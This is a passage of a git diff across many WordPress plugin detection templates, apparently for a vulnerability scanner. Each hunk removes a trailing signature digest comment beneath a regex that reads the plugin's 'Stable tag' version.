'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009723fb9d5cc518917d1d63ff78db96d1270d8b76b3e82859d45cef1d7e0292e3022063d79437855b41c5514e666953a8427e46dc7a9fd4b59808ed1f8a71353e35df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index cb920711bb..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0f01653fae6e65eacb0b63f008f34c1f4efd7955cb86159b74ef6cdeba45e9a022100e052e87393749daa920baaf3335422fb335ebfc43362f597c6ad340443a0b88d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 79b5736424..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087e23acd4a4177dce4b0b2a79e85ab43ee5c11287d696fc42a58ee5b4840148b02207f850b69a5f07b4b056325bdaebf6779eafb8dfeedc2b6f396baef8e4470d64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 965e56753f..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075c1dddf9a70a8706878bc3d54b07873385c43114cf777508da8879edaf0c826022100e7c6422d535ce054e291b0e02ab1a8c1611953ae85f39144712e79a3b9233d6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d7e375754d..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220285e3cd9ab358ede051d7d18b730e1b980766236449f54b467bb4fd3652004f4022036faf3aee6d46a7409191639712b62155c3d054527ed9d20859beb315bc77422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 60854aa70f..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db65fb5913db67f2184b84d645c504556fec34a2ec487e585bd5a9359737b16f0220656799ee616826ab843ba1ad780181b4c313ecec294ee73f9056119cd4183fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index f9dc256742..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010946f40808b25b3087b154bee2d92a29e2905f815988db0e72538059a322988022100ecd30893267c0eaeca135af555d46e0799826e0da200be008e5f004f5a4f2b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 41304e2041..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028d682c82b809e77e5c2dc813f48afa69fbf4b8c8387032d2bc523d147d1679102201e397e9ed3600a767873ae0f2dcfa0ec27fdec61d0653ddabc98abebcb726a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 85838db941..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203688a6cf4365354a23a33952bcbacfe8d2df5446d0078e3225b246bb4065b7130221009828e2fb09215bc5e13fe2a5b4611b6b648cb5bfd216b4010fee0ee44fac77c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 1535203cc0..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acddf8a6e85b00a7ae3873ca826e5970aa18c810c45d09813f94583860fdbcb2022100a2d6a0c6041ddbff3367b91a6198b7df1ceab65610af40ce958339ea071961bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 61b657f764..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc5d8e52c3b958f3e2b145144dd3b090a3eeb3523d89d9109151f6b0f4051ebb0220196b7195e5c261edc83a8cb9080968d2dbb916f2bd32dfca665624d311df9b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 21df8cec2d..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3f2ecd9eec04caf0fb007676543952b491dc71b24f9352fa617272cca0caa66022100cec7cedbc17abdb1e7cf67f58a882f94de07dfb6e75b6f58fd865b7f64cc2b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d7fa6d2caa..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f118d7f3f06e897042c96b60a95fa4417f4af15709663552b347c3dd66b4277022100e1435a9baf2d7961d375aa2691c019b5422e69f45d8c13c2796a8c57af4152a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 979e325834..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3b85815d70885bbbc6d257c7ecca351213962c91b0e558993f766fa7cdbd257022100fa825257c3b7b90fb28c7ce38ad4ef68acecfa81357f407edfbaf07115977fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 763b33b660..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220755011c469209c588eded736fcd32ab479374ef2f0f403a7fa8ee976a8cc7c1b02201f9bc34b2b4c221ee73541c8dc21c586e8cedd33b85e8634268f4c151142fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 7a9b82c625..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e05432e3edeb5c11b7c22efdabc12fade7bffb997e2ece55d3c783e7e61c0eb2022100df4fc2ff3cb0aa7efa335673dccad52fb38afb07e53a80f48da61514d7e11aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 0864394d02..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a5dfc62c4bd77645cae935d95bf268282afad038a4637b1706d7294e1171261022100f5a540150c966739180c4d46957b3c79aaab48a1112ebf9e10e681aab51c9e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index ace69d621f..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3bedddc13bd28b39da2c2bca7695678dacf946d860cf251c334f80cfaab45f8022100f5e4b92b4db38eb6fefe4c274fa014c8c2236ccb503a14d2998a8dce025c97de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index d6562fe5be..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a631a7142134a3a70f792f254db692631b390def25335eac94a591429c744f5602200f21c8604d8c36a21c08bc833f4a8ea54bec6acd985080d12a4175bb1045c26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 0f26435fa4..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a3fa2417607264b8264f50739c88338de7fea6439a93e80d8055aecb22eecb022100c270e10e34a4e296b3fbaad38b170a4d293c8974366ebd8bc72a0ebe0b4e4d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2be22d8fcb..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207be231429679770720d13f1f6cd4769d91211c2c5d658c37d8e56481904fe497022015d31c8336ac81b6160f119b6b1f38f92bd7e809136289d78bcd86e804e16f06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 3665b5f9c5..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200fae3b24a23347e3039d0085fd6e7524ee088fa825cbb2bafbe9ea046dd35e8202202179ab7823eea7a825d7856452019c4c079777147533e81378f17bb367b305c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 18a5311bea..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093d56a7033ad661f7c38996ecaf70758bc63ed5891356d55480d217bd9a267c902201098e1cefee25b1eb37f01246726469cdee738b5ec12a357526816287e31cb6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index b71afc4415..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207fdacbbc7e17c8ba7d73efbe284ee860fa4852cfa55815c0b866496760005b570220720cc33c3861496f19591d97c0bc3b686ec4d46cbaf9c791b632a2df195942c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index bf956fda92..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b763ef0b627ffdd00861f63d9e6ddfd83668a75b985a90d3feb1364599eee6d0221009a952c7ad55f78297ce4954967a2a8b7802068c7aa0eb80f8f538b7829b30e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 5dc27dfbf8..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6185025a11933332e04ea60fd0bdb3f7fefdcead48b95d323c82f5cd805e33b0220148b06a675540b86b31d32647a2f3a6dd899a29c2cd50090265d54e2c542da9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 0acef41564..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce1eeebf6bb0d21df9ed68fd31ab13b1e94bd23106ea041f1880d8d6970c53a70220028aea7ef937c8c94dc473a023a3bdb15bed3d8343dd179ee909e6918ad85b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 4b8f12f7dd..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069b2f6c9715a1bfe94ab44a0d0858aada976f0f808e8f128f1bea072838246de0221008043e24af301d5480c19a006323e13138a3139de2913c6f1e25722344761714d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 6966e9d212..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e88766c2c34e73a8cd62cb9ba322985f3c0c8e9a0b6003cac99ca89c5bd30f7b022075b93709f0d4aae957b18e0137933c0e07806e6b3300495c67c7773487b55049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 2d17b94072..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061015b7f99dd9657018412a489e65cdf28d576da57b2c4809a3d5547b0ef209f022055c6ed09c5358dde9623412498eb7c948e43d5f7ef739290278e412b073151d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 0b5201d733..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c01ed5745d2c84fe949cc6da571fb5bab31bd5ca997a6fcaad4b25db0141cf8022006436c209b8a64789e9eede83daca386b9d9ae7236d07db52433a416a9c75c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 096d1adf54..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ccbb12edcf6b28a2b0db3066ca32de5c91e9230e2629eb9f20fab4721213d614022043fff676972e511fe44235306b48945620a1e1f20367b4ca6129e208a600f6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 70db6e9bd1..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073fd11fa5fde81d7eb4cb816ec25fdf4cf03ceaffa0641e66cbd7b1b36399fc202205e7891dc4d6592a061c19242dd67f87f0d27c122830645f86af4a13ccceb834f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 1c66f52de0..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc68393c65a2b289659b2627db589caf0afdb94404fa51f18a893de7befa0264022100d284f3c395c38be590d67bd182ee7e6b6237d429fcbdf1ba1b68a227eacd142f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 77add18b70..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d152a8979b5c9632ca1d1aa042a1569aa326681f0c4324f62642a87acea1971a02207921525d19f8cff5ea48d5d5749dce72d038d74086c486d770132cdf34ffd513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 0b2a29a34d..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ad26ba10d0c90df93f73fb49692bd8689fd619ab1c0fad402e0805aa3714c3b02202a47650f0c0f7ee7f947ddb7d5d21cdcac1744a233f429fac70cfcd9402c63e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 040ff060c6..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cf252954ccefd208c94aacb4c95b8b4cfc200ecacdb230e3995cae40118e4bf022100ac2e7124a852afeac549ca5df2b98a0a422833435001ad3b53ab87508b1f2631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 321980822b..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220723a466cdf6204175ec43712aaea9591c5c9e911932b57d37f27e070a5b880b3022100ea73f80d9413c2d486b10bffd96351d446dc72d0a1b5330a622adadf9523c8c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 1d9632e8a1..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044b3037027b1997617df0d8a9aea4800daeb00b9ec759823b14380b19d0848cf022036323b31532e4af002a328b0d15ca65b5b90be9d2445a970803842ffd34b55d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 1c15185800..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d5b7361cba850754aa203299aaf94c4a1c299d8b3ccc6e5fa887c65eb850ea8022100b23c18b15740e63bf8fe11a8988e7f59c0a271727162d7e02a576a67db270d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4f9a8a5339..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c477016fd0df766e74ed70efad3dba5e053632a3afbd52898dd4c481fe1fbdf022022d4e4128c1373960559e9cdc4bda0d815ddfc59cb87c0054444c0146e6a34aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index b05346a392..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205fb068721c7f620fc953014c5626a2660dee7d12f5235f63ae232c42d8d39edf022100fc472b16e7d94ed824105e58bec3333f03f07bf88f4bff173077911dc1cd57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index cbcd6eaca0..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202af2e8b9787fce2afeff42c68d2d99b120348ff2ec4aabf29e90801a66f6abfc0221008c84c879124d1e1e2970b3b82f0144811ee5e1e21133e4a17f246497e24bbb47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index af01cd7a99..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0fedb65fda625860b3edb4303b3fb4c0e162ccf34fbfa89014f7df9a2d232c7022076d29aa5f1fdfb11b9f2b5c456fa78919d5de879b1e1bd73a36438a4bdd188df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 7329b3b029..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9d6d81c20f991017f3124223e6862b9692e069a9959faa39e19c8a07731391e022100c3bce32805f85558636a57fb11cac6d911687038ec8447d5eb53cbbd8762d237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index f2ec9c13c4..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de3e2243c193310f4e0973ebba1e4d973f6db48e4e8caa627d6eb12bfeda905b02205f7ba99a6fc6a1e177c7d4ce15c6c118ee69dd37aae63b565101ab61b575e67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index b8719a33f1..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008da62990914f26f6d6c9a23d5b9933db7e4390e583dbf364bcae18eaadda52fe02201361fb4421bfdd870700543fd175842c4b4ef1866bab0680887dd2d0864a6cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9d15a9ecc7..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 